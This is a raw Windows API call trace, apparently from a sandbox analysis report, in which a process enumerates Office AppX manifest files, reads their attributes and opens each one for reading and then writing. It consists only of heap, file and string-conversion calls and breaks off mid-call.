MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 105 [0098.801] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.801] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e0e651, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e0e651, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", cAlternateFileName="APEF10~1.XML")) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c5a8 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0098.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89470 [0098.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0098.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89470 | out: hHeap=0x20000) returned 1 [0098.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0098.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.802] AreFileApisANSI () returned 1 [0098.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.802] AreFileApisANSI () returned 1 [0098.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 105 [0098.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.803] GetFileType (hFile=0x418) returned 0x1 [0098.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.803] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.803] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.803] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.803] CloseHandle (hObject=0x418) returned 1 [0098.803] AreFileApisANSI () returned 1 [0098.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 105 [0098.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.804] GetFileType (hFile=0x418) returned 0x1 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.804] CloseHandle (hObject=0x418) returned 1 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.805] AreFileApisANSI () returned 1 [0098.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 105 [0098.805] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e0e651, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e0e651, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.805] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x863, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", cAlternateFileName="AP5F49~1.XML")) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cce0 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x892a0 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0098.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x892a0 | out: hHeap=0x20000) returned 1 [0098.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.807] AreFileApisANSI () returned 1 [0098.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0098.807] AreFileApisANSI () returned 1 [0098.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 105 [0098.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.807] GetFileType (hFile=0x418) returned 0x1 [0098.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.807] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.808] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.808] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.808] CloseHandle (hObject=0x418) returned 1 [0098.808] AreFileApisANSI () returned 1 [0098.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 105 [0098.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.808] GetFileType (hFile=0x418) returned 0x1 [0098.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.808] CloseHandle (hObject=0x418) returned 1 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 